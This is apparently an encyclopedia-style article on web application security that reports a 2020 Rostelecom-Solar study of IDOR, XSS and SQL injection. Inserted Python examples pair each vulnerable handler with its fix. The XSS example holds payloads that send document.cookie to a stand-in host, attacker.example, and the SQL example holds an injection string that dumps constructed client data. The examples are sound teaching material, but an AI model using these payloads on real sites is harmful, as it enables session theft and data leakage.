Main article: Security on the Internet
2020
BI.Zone and Ngenix announce the start of technology cooperation
On June 1, 2020 Ngenix, a provider of services for web resources, reported that it had signed a cooperation agreement with BI.Zone, a Russian developer of cybersecurity solutions, covering research and security assurance for public web applications.
Rostelecom-Solar: about 70% of web applications contain critical vulnerabilities
On May 18, 2020 Rostelecom-Solar reported that it had analyzed the security of web applications belonging to organizations in the public and banking sectors, manufacturing, information technology, information security and other areas. About 70% of the applications studied contained critical vulnerabilities that allow attackers to gain access to confidential data of the organization and its users, and to perform various transactions in the vulnerable online services on the victim's behalf.
According to the company, the research was based on data obtained by Rostelecom-Solar experts during cyber exercises, penetration tests and security analysis projects. In total, more than 30 web applications were analyzed, among them corporate Internet portals, remote banking systems, CRM systems and others. The results show that critical and easily exploitable vulnerabilities are present in practically every web application. Most of them are connected with missing filtering of incoming data on the web server side and with shortcomings at the business logic layer of the applications.
Nearly 70% of the web applications were subject to IDOR vulnerabilities (Insecure Direct Object References). By exploiting them, an attacker can work out how identifiers are assigned in the system and gain unauthorized access to other users' data. The vulnerability is most often found in web applications with complex logic, for example remote banking systems. Successful exploitation of IDOR in such a system can let an attacker obtain, for example, information on users' transactions and account balances, or modify their profile data.
As our practice shows, logical vulnerabilities, for example of the IDOR class, are, as of May 2020, encountered more often than others. The reason is that vulnerabilities connected with logic are very difficult to detect with code scanners. But they are also among the most critical: attackers can gain access to other users' data. In the case of banking systems this can be very sensitive information. Alexander Kolesov, head of the security analysis department, Rostelecom-Solar
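The IDOR pattern described above, as an added example that is not part of the original report and not Rostelecom-Solar's or any bank's code: a hypothetical remote-banking "get account" endpoint over constructed sample accounts, first trusting the identifier taken from the URL, then checking ownership on the server on every request. The enumeration helper shows why an identifier that is merely hard to guess is not a control: the attacker, logged in as himself, simply walks the identifier space.

```python
"""Added example: an IDOR in a bank-style account endpoint and its fix.

Hypothetical in-memory API with constructed data; not code from the report.
"""
from dataclasses import dataclass

# Constructed sample data: two customers, each owning one account.
ACCOUNTS = {
    1001: {"owner": "alice", "balance": 2500, "transactions": ["+2000 salary", "-500 rent"]},
    1002: {"owner": "bob", "balance": 70, "transactions": ["+100 gift", "-30 groceries"]},
}


class Forbidden(Exception):
    """Raised when the caller is not allowed to read the requested object."""


@dataclass
class Request:
    user: str        # authenticated identity taken from the session, never from the client
    account_id: int  # value taken from the URL, fully attacker-controlled


def get_account_vulnerable(req: Request) -> dict:
    """IDOR: trusts the identifier and never checks who owns the account."""
    return ACCOUNTS[req.account_id]


def get_account_fixed(req: Request) -> dict:
    """Authorization is enforced on the server, per object, on every request."""
    account = ACCOUNTS.get(req.account_id)
    # Treat a missing account and a foreign account identically, so the response
    # does not tell an attacker which identifiers exist.
    if account is None or account["owner"] != req.user:
        raise Forbidden(f"user {req.user!r} may not read account {req.account_id}")
    return account


def enumerate_accounts(handler, user: str, id_range):
    """What an attacker does: iterate identifiers and keep whatever the endpoint returns."""
    leaked = {}
    for account_id in id_range:
        try:
            leaked[account_id] = handler(Request(user=user, account_id=account_id))
        except (Forbidden, KeyError):
            pass
    return leaked


if __name__ == "__main__":
    # Bob, logged in as himself, walks the identifier space.
    print(enumerate_accounts(get_account_vulnerable, "bob", range(1000, 1010)))  # leaks alice's account too
    print(enumerate_accounts(get_account_fixed, "bob", range(1000, 1010)))       # only bob's own account
```

The check in get_account_fixed is the point the quote makes: the access decision is bound to the server-side session identity and the object being requested, and it is made on the back end, where the client cannot skip it.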
As of May 2020, more than 50% of web applications have shortcomings in filtering data arriving at the server, which makes attacks of the XSS type (Cross-Site Scripting) possible. Such attacks allow an attacker to inject malicious JavaScript code into a web page; the code is executed in the victim's browser when the page is opened. It can communicate with the attacker's web server and send it, for example, the user's cookies, with which the attacker can authenticate to the Internet resource under the victim's credentials and act on her behalf.
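An added example (not from the report, not any product's code) of the filtering shortcoming described above: a hypothetical comment widget rendered by string concatenation, the same widget with HTML output encoding, and a small parser-based check that counts the script tags and on* event handlers a browser would act on. The two payloads are constructed for the example; one works in text context, the other breaks out of an attribute value. The cookie helper shows the standard mitigation for the cookie-theft step in the text: an HttpOnly cookie is not readable from document.cookie, so an injected script cannot exfiltrate it.

```python
"""Added example: XSS through unescaped output, and the output-encoding fix.

Hypothetical mini comment page with constructed payloads; not code from the report.
"""
import html
from html.parser import HTMLParser

# Constructed attacker payloads: one for text context, one that escapes an attribute value.
PAYLOAD_SCRIPT = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'
PAYLOAD_ATTR = '" onmouseover="fetch(\'https://attacker.example/?c=\'+document.cookie)'


def render_unsafe(author: str, comment: str) -> str:
    """Vulnerable: user data is concatenated straight into the page."""
    return f'<div class="comment" data-author="{author}"><p>{comment}</p></div>'


def render_safe(author: str, comment: str) -> str:
    """Fixed: every user-controlled value is HTML-encoded for the context it lands in.

    quote=True also encodes " and ' so an attribute value cannot be broken out of.
    """
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(comment, quote=True)}</p></div>')


class _Inventory(HTMLParser):
    """Records start tags and on* event-handler attributes as the tokenizer sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def active_content(page: str) -> dict:
    """Approximate 'what would execute' by parsing the page the way a browser tokenizes it."""
    inv = _Inventory()
    inv.feed(page)
    return {"script_tags": inv.tags.count("script"), "event_handlers": inv.handlers}


def session_cookie(value: str) -> str:
    """Set-Cookie value that keeps the session token out of document.cookie."""
    return f"session={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    print(active_content(render_unsafe(PAYLOAD_ATTR, PAYLOAD_SCRIPT)))  # 1 script tag, onmouseover handler
    print(active_content(render_safe(PAYLOAD_ATTR, PAYLOAD_SCRIPT)))    # nothing executable
    print(session_cookie("constructed-token"))
```

Encoding is context-specific: html.escape is correct for element text and quoted attribute values, which is all this widget has; data placed into a JavaScript block, a URL or a CSS value needs the encoder for that context, and a template engine that escapes by default removes most of the chances to forget.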
Another 30% are connected with the possibility of SQL injection because of absent or incorrect filtering of incoming user requests. Through it an attacker can gain control over the organization's database, including access to confidential client data (for example passport details, credit card numbers, transaction information, etc.) and the ability to modify it directly on the server. In some cases the attacker can achieve operating system command execution and thereby take control of the server, which lets him copy all data held in storage. This type of vulnerability carries the most serious risks of data leakage (including personal and payment data) as well as financial and reputational losses.
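An added example, not code from the report: a hypothetical client-lookup query built by string formatting against an in-memory SQLite table of constructed rows, next to the parameterized form. The injected input closes the string literal and appends an always-true condition, so the vulnerable query returns every client's passport and card data, while the parameterized query treats the same input as a plain login value and finds nothing.

```python
"""Added example: SQL injection in a client lookup and the parameterized fix.

Hypothetical schema and constructed data; not from the report.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory table standing in for the organization's client database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE clients (id INTEGER PRIMARY KEY, login TEXT, passport TEXT, card TEXT)"
    )
    conn.executemany(
        "INSERT INTO clients (login, passport, card) VALUES (?, ?, ?)",
        [
            ("alice", "4500 123456", "4111 1111 1111 1111"),  # constructed sample rows
            ("bob", "4500 654321", "5500 0000 0000 0004"),
        ],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, login: str) -> list:
    """Untrusted input is spliced into the SQL text, so the attacker rewrites the query."""
    sql = f"SELECT login, passport, card FROM clients WHERE login = '{login}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, login: str) -> list:
    """The SQL shape is fixed; the driver passes the value separately, so it is only data."""
    return conn.execute(
        "SELECT login, passport, card FROM clients WHERE login = ?", (login,)
    ).fetchall()


# Constructed attacker input: closes the string literal and appends an always-true condition.
INJECTION = "nobody' OR '1'='1"


if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, INJECTION))     # dumps every client row
    print(lookup_parameterized(db, INJECTION))  # []
```

Filtering the input, as the report recommends, reduces the attack surface, but the structural fix is that the query text never contains user data: the same parameterized statement is immune to any quoting trick regardless of what the filter missed.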
These vulnerabilities have existed for a long time; for example, experts have been predicting the death of SQL injection for many years, yet even in up-to-date applications, as of May 2020, it is possible to encounter this vulnerability. Protection of web applications is first of all the developer's task. One should not rely completely on protective tools; in particular, a Web Application Firewall cannot detect attacks aimed at vulnerabilities in application logic, for example IDOR. It is necessary to observe the key principles of secure development already at the application creation stage: always filter data arriving from the user and check access rights at the back-end level, not in the client interface. Besides, security analysis of the application should be carried out periodically. Alexander Kolesov, head of the security analysis department, Rostelecom-Solar
Read Also
- Website security
- Security and problems of social networks
- Security on social networks
- Software security
See Also
- Censorship on the Internet. World experience
- Censorship (control) on the Internet. Experience of China
- Censorship (control) on the Internet. Experience of Russia, Roskomnadzor
- Law on regulation of Runet
- VPN and privacy (anonymity, anonymizers)
- Protection of critical information infrastructure of Russia
- Law On security of critical information infrastructure of the Russian Federation
- National Biometric Platform (NBP)
- Single Biometric System (SBS) of bank customers' data
- Biometric identification (Russian market)
- Directory of biometrics solutions and projects
- Digital economy of Russia
- Information security of the digital economy of Russia
- SORM (System for Operational Investigative Activities)
- State system of detection, prevention and elimination of consequences of computer attacks
- National Internet traffic filtering system (NASFIT)
- Yastreb-M, statistics of telephone conversations
- How to bypass Internet censorship at home and at the office: 5 easy ways
- Revizor (Auditor), the system for monitoring website blocking in Russia
- Single Data Transmission Network (SNDT) for state agencies (Russian State Network, RSNet)
- Data transmission network of public authorities (SPDOV)
- Unified telecommunications network of the Russian Federation
- Electronic Government of the Russian Federation
- Cyber crime in the world
- NIST requirements
- Global Cybersecurity Index
- Cyber wars, cyber war between Russia and the USA
- Cyber crime and cyber conflicts: Russia, FSB, National Coordination Center for Computer Incidents (NKTsKI), Information Security Center (ISC) of the FSB, Directorate K of the BSTM of the Ministry of Internal Affairs of the Russian Federation, Ministry of Internal Affairs of the Russian Federation, Ministry of Defence of the Russian Federation, National Guard of the Russian Federation
- Cyber crime and cyber conflicts: Ukraine
- Cyber crime and cyber conflicts: USA, CIA, NSA, FBI, US Cybercom, U.S. Department of Defense, NATO, Department of Homeland Security, Cybersecurity and Infrastructure Security Agency (CISA)
- Cyber crime and cyber conflicts: Europe, ENISA
- Cyber crime and cyber conflicts: Israel
- Cyber crime and cyber conflicts: Iran
- Cyber crime and cyber conflicts: China
- How the USA spied on chip production in the USSR
- Security risks of communication in a mobile network
- Information security in banks
- Digital transformation of the Russian banks
- Overview: IT in banks 2016
- The policy of the Central Bank in the field of data protection (cyber security)
- Losses of the organizations from cyber crime
- Losses of banks from cyber crime
- IT development trends in insurance (cyberinsurance)
- Cyber attacks
- Overview: Security of information systems
- Information security
- Information security (world market)
- Information security (Russian market)
- The main trends in data protection
- Data protection software (world market)
- Data protection software (Russian market)
- Pentesting (penetration testing)
- Cybersecurity: encryption tools
- Cryptography
- VPN: Virtual private networks
- Security incident management: problems and their solutions
- Authentication systems
- Law on personal data No. 152-FZ
- Personal data protection in the European Union and the USA
- Prices of user data on the cybercriminal market
- Jackpotting
- Ransomware (encryptors)
- WannaCry (ransomware)
- Petya/ExPetr/GoldenEye (ransomware)
- Malware (malicious software)
- APT: targeted attacks
- DDoS and DeOS
- Attacks on DNS servers
- DoS attacks on content delivery networks (CDN)
- How to protect against a DDoS attack. TADetails
- Rootkit
- Fraud Detection System (fraud detection, antifraud)
- Directory of antifraud solutions and projects
- How to select an antifraud system for a bank? TADetails
- Security Information and Event Management (SIEM)
- Directory of SIEM solutions and projects
- What a SIEM system is useful for and how to implement it
- What a SIEM system is needed for and how to implement it. TADetails
- Intrusion detection and prevention systems
- Repelling local threats (HIPS)
- Protection of confidential information from internal threats (IPC)
- Phishing, DMARC, SMTP
- Trojan
- Botnet
- Backdoor
- Worms: Stuxnet, Regin
- Flood
- Data loss prevention (DLP)
- Skimming (shimming)
- Spam
- Acoustic attacks
- Antispam software solutions
- Classic file infectors
- Antiviruses
- Cybersecurity: means of protection
- Backup systems
- Backup systems (technologies)
- Backup systems (security)
- Firewalls